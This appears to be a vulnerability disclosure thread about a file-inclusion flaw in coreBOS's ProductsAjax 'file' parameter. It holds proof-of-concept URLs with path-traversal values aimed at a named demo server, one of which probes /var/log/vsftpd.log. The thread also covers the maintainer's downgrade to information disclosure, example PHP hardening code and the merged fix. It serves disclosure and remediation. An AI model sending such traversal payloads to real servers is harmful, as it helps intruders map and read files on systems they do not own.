PHP Remote File Inclusion in tsolucio/corebos

Valid

Reported on

Oct 31st 2021


Description

An attacker can use Local File Inclusion (LFI) to trick the web application into exposing or running files on the web server. An LFI attack may lead to information disclosure, remote code execution, or even Cross-site Scripting (XSS).

Proof of Concept

// PoC.js

Link --> http://demo.corebos.com/index.php?module=Products&action=ProductsAjax&file=../../../../../../index&ajax=true%27&search=true&gname=&query=true&search_field=productname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=E&popuptype=detailview&form=EditView&forfield=&srcmodule=&forrecord=&select=enable&curr_row=0&productid=0&recordid=74%27&form=EditView&forfield=&srcmodule=%27&forrecord=&return_module=Accounts

Vulnerable Parameter --> file 

Impact

This vulnerability is capable of exposing or running files on the web server.
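The thread below narrows the finding to the `file` parameter of the `ProductsAjax` action leaking whether a file exists (and the server's full path) through PHP's include error. As an added illustration that is not coreBOS code, the following contrasts that weak pattern with one that allowlists the parameter, confines the resolved path to the module directory, and returns the same answer whether the file is missing, restricted, or outside the allowed set; the directory and file names are assumptions.

```php
<?php
// Added illustration, not coreBOS code: resolving a "file" request
// parameter before include(). MODULE_DIR and the allowlisted names are
// assumptions; the real corebos handler is not shown in this report.

const MODULE_DIR = __DIR__ . '/modules/Products';   // assumed base dir

// Weak pattern: the raw parameter reaches include(). A missing file
// triggers a PHP warning that prints the absolute path, and a restricted
// file produces a different error, so the caller learns whether a file
// exists even when its contents are never returned.
function includeFileWeak(string $file): void
{
    include MODULE_DIR . '/' . $file . '.php';
}

// Hardened pattern: allowlist by name, then confirm the resolved path
// stays inside MODULE_DIR, and give one uniform error either way.
function resolveModuleFile(string $file): ?string
{
    $allowed = ['ProductsAjax', 'ListView', 'DetailView'];   // assumed names

    // Reject anything that is not a plain identifier (no '/', '..', NUL).
    if (!preg_match('/\A[A-Za-z0-9_]+\z/', $file) || !in_array($file, $allowed, true)) {
        return null;
    }

    $base = realpath(MODULE_DIR);
    $path = realpath(MODULE_DIR . '/' . $file . '.php');
    // realpath() is false for a missing file; the prefix check also catches
    // a symlink inside MODULE_DIR that points elsewhere on the filesystem.
    $prefix = $base === false ? '' : $base . DIRECTORY_SEPARATOR;
    if ($base === false || $path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

function includeFileHardened(string $file): void
{
    $path = resolveModuleFile($file);
    if ($path === null) {
        // Identical response for "not allowed", "missing" and "traversal":
        // no path in the message, no hint about existence on disk.
        http_response_code(400);
        echo 'Invalid file';
        return;
    }
    include $path;
}

includeFileHardened($_GET['file'] ?? '');
```

Keeping `display_errors` off in production closes the remaining channel: even the hardened version should never let a PHP warning with a server path reach the HTTP response.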

Joe Bordes
a month ago

Maintainer


@shellinjector I can't reproduce this. I correctly get an invalid file error message. Can you make sure you indicated the link correctly?

Thanks

0x9x
a month ago

Researcher


Sorry for the confusion!

Actually I'm completely banned from the server! Let me check when changing the IP! I'm not using any specific tool to do more testing here, but as you can see there is an error that shows the full path of the server. Anyway, let me check it next time.

Thanks

Joe Bordes
a month ago

Maintainer


Ah, I understand now. The error is not that the file can be included/loaded/seen but that you can know if it exists or not, right?

It is a disclosure of information, not a remote file inclusion.

If that is the case I would ask you to reduce the severity and I will hide that information.

0x9x
a month ago

Researcher


Sure! You're right!

Existing and readable file --> index.php

Link --> http://demo.corebos.com/index.php?module=Products&action=ProductsAjax&file=/index&ajax=true%27&search=true&gname=&query=true&search_field=productname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=E&popuptype=detailview&form=EditView&forfield=&srcmodule=&forrecord=&select=enable&curr_row=0&productid=0&recordid=74%27&form=EditView&forfield=&srcmodule=%27&forrecord=&return_module=Accounts

Restricted but existing --> config.inc & config

Link --> http://demo.corebos.com/index.php?module=Products&action=ProductsAjax&file=/config.inc&ajax=true%27&search=true&gname=&query=true&search_field=productname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=E&popuptype=detailview&form=EditView&forfield=&srcmodule=&forrecord=&select=enable&curr_row=0&productid=0&recordid=74%27&form=EditView&forfield=&srcmodule=%27&forrecord=&return_module=Accounts

Thanks,

0x9x
a month ago

Researcher


Other link (full path of the server) --> http://demo.corebos.com/index.php?module=Products&action=ProductsAjax&file=../../../../../../var/log/vsftpd.log&ajax=true&search=true&gname=&query=true&search_field=productname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=E&popuptype=detailview&form=EditView&forfield=&srcmodule=&forrecord=&select=enable&curr_row=0&productid=0&recordid=74&form=EditView&forfield=&srcmodule=%27&forrecord=&return_module=Accounts

Joe Bordes validated this vulnerability a month ago
0x9x has been awarded the disclosure bounty
The fix bounty is now up for grabs
0x9x
a month ago

Researcher


Thanks for your updates!

Joe Bordes confirmed that a fix has been merged on c05cdd a month ago
Joe Bordes has been awarded the fix bounty
Joe Bordes
a month ago

Maintainer


Thanks for your help!